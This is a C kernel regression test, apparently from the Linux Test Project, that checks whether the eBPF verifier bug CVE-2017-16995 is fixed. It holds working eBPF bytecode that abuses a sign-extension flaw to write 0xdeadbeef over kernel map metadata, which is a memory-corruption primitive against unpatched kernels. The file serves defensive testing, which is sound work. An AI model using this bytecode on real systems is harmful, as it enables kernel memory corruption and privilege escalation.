1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3 * Copyright (c) 2019 Richard Palethorpe <rpalethorpe@suse.com>
4 * Original byte code was provided by jannh@google.com
5 *
6 * Check for the bug fixed by 95a762e2c8c942780948091f8f2a4f32fce1ac6f
7 * "bpf: fix incorrect sign extension in check_alu_op()"
8 * CVE-2017-16995
9 *
10 * This test is very similar to the reproducer found here:
11 * https://bugs.chromium.org/p/project-zero/issues/detail?id=1454
12 *
13 * However it has been modified to try to corrupt the map struct instead of
14 * writing to a noncanonical pointer. This appears to be more reliable at
15 * producing stack traces and confirms we would be able to overwrite the ops
16 * function pointers, as suggested by Jan.
17 *
18 * If the eBPF code is loaded then this is considered a failure regardless of
19 * whether it is able to cause any visible damage.
20 */
21
22 #include <string.h>
23 #include <stdio.h>
24 #include <inttypes.h>
25
26 #include "config.h"
27 #include "tst_test.h"
28 #include "tst_capability.h"
29 #include "lapi/socket.h"
30 #include "lapi/bpf.h"
31 #include "bpf_common.h"
32
33 #define LOG_SIZE (1024 * 1024)
34
35 static const char MSG[] = "Ahoj!";
36 static char *msg;
37
38 static char *log;
39 static uint32_t *key;
40 static uint64_t *val;
41 static union bpf_attr *attr;
42
load_prog(int fd)43 static int load_prog(int fd)
44 {
45 static struct bpf_insn *prog;
46 struct bpf_insn insn[] = {
47 BPF_LD_MAP_FD(BPF_REG_1, fd),
48
49 // fill r0 with pointer to map value
50 BPF_MOV64_REG(BPF_REG_8, BPF_REG_10),
51 BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, -4), // allocate 4 bytes stack
52 BPF_MOV32_IMM(BPF_REG_2, 0),
53 BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_2, 0),
54 BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),
55 BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
56 BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
57 BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
58 BPF_EXIT_INSN(), // exit
59
60 // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff
61 BPF_MOV32_IMM(BPF_REG_1, -1),
62 // r1 = 0x1'0000'0000, mistreated as 0
63 BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),
64 // r1 = 64, mistreated as 0
65 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 26),
66
67 // Write actual value of r1 to map for debugging this test
68 BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),
69
70 // Corrupt the map meta-data which comes before the map data
71 BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
72 BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_1),
73
74 BPF_MOV64_IMM(BPF_REG_3, 0xdeadbeef),
75 BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
76 BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_1),
77 BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
78 BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_1),
79 BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
80 BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_1),
81 BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
82
83 // terminate to make the verifier happy
84 BPF_MOV32_IMM(BPF_REG_0, 0),
85 BPF_EXIT_INSN()
86 };
87
88 if (!prog)
89 prog = tst_alloc(sizeof(insn));
90 memcpy(prog, insn, sizeof(insn));
91
92 memset(attr, 0, sizeof(*attr));
93 attr->prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
94 attr->insns = ptr_to_u64(prog);
95 attr->insn_cnt = ARRAY_SIZE(insn);
96 attr->license = ptr_to_u64("GPL");
97 attr->log_buf = ptr_to_u64(log);
98 attr->log_size = LOG_SIZE;
99 attr->log_level = 1;
100
101 TEST(bpf(BPF_PROG_LOAD, attr, sizeof(*attr)));
102 if (TST_RET == -1) {
103 if (log[0] != 0)
104 tst_res(TPASS | TTERRNO, "Failed verification");
105 else
106 tst_brk(TBROK | TTERRNO, "Failed to load program");
107 } else {
108 tst_res(TINFO, "Verification log:");
109 fputs(log, stderr);
110 }
111
112 return TST_RET;
113 }
114
setup(void)115 static void setup(void)
116 {
117 rlimit_bump_memlock();
118 memcpy(msg, MSG, sizeof(MSG));
119 }
120
run(void)121 static void run(void)
122 {
123 int map_fd, prog_fd;
124 int sk[2];
125
126 memset(attr, 0, sizeof(*attr));
127 attr->map_type = BPF_MAP_TYPE_ARRAY;
128 attr->key_size = 4;
129 attr->value_size = 8;
130 attr->max_entries = 32;
131
132 map_fd = bpf_map_create(attr);
133
134 memset(attr, 0, sizeof(*attr));
135 attr->map_fd = map_fd;
136 attr->key = ptr_to_u64(key);
137 attr->value = ptr_to_u64(val);
138 attr->flags = BPF_ANY;
139
140 TEST(bpf(BPF_MAP_UPDATE_ELEM, attr, sizeof(*attr)));
141 if (TST_RET == -1)
142 tst_brk(TBROK | TTERRNO, "Failed to lookup map element");
143
144 prog_fd = load_prog(map_fd);
145 if (prog_fd == -1)
146 goto exit;
147
148 tst_res(TFAIL, "Loaded bad eBPF, now we will run it and maybe crash");
149
150 SAFE_SOCKETPAIR(AF_UNIX, SOCK_DGRAM, 0, sk);
151 SAFE_SETSOCKOPT(sk[1], SOL_SOCKET, SO_ATTACH_BPF,
152 &prog_fd, sizeof(prog_fd));
153
154 SAFE_WRITE(1, sk[0], msg, sizeof(MSG));
155
156 memset(attr, 0, sizeof(*attr));
157 attr->map_fd = map_fd;
158 attr->key = ptr_to_u64(key);
159 attr->value = ptr_to_u64(val);
160 *key = 0;
161
162 TEST(bpf(BPF_MAP_LOOKUP_ELEM, attr, sizeof(*attr)));
163 if (TST_RET == -1)
164 tst_res(TFAIL | TTERRNO, "array map lookup");
165 else
166 tst_res(TINFO, "Pointer offset was 0x%"PRIx64, *val);
167
168 SAFE_CLOSE(sk[0]);
169 SAFE_CLOSE(sk[1]);
170 SAFE_CLOSE(prog_fd);
171 exit:
172 SAFE_CLOSE(map_fd);
173 }
174
175 static struct tst_test test = {
176 .setup = setup,
177 .test_all = run,
178 .min_kver = "3.18",
179 .caps = (struct tst_cap []) {
180 TST_CAP(TST_CAP_DROP, CAP_SYS_ADMIN),
181 {}
182 },
183 .bufs = (struct tst_buffers []) {
184 {&key, .size = sizeof(*key)},
185 {&val, .size = sizeof(*val)},
186 {&log, .size = LOG_SIZE},
187 {&attr, .size = sizeof(*attr)},
188 {&msg, .size = sizeof(MSG)},
189 {},
190 },
191 .tags = (const struct tst_tag[]) {
192 {"linux-git", "95a762e2c8c9"},
193 {"CVE", "2017-16995"},
194 {}
195 }
196 };
197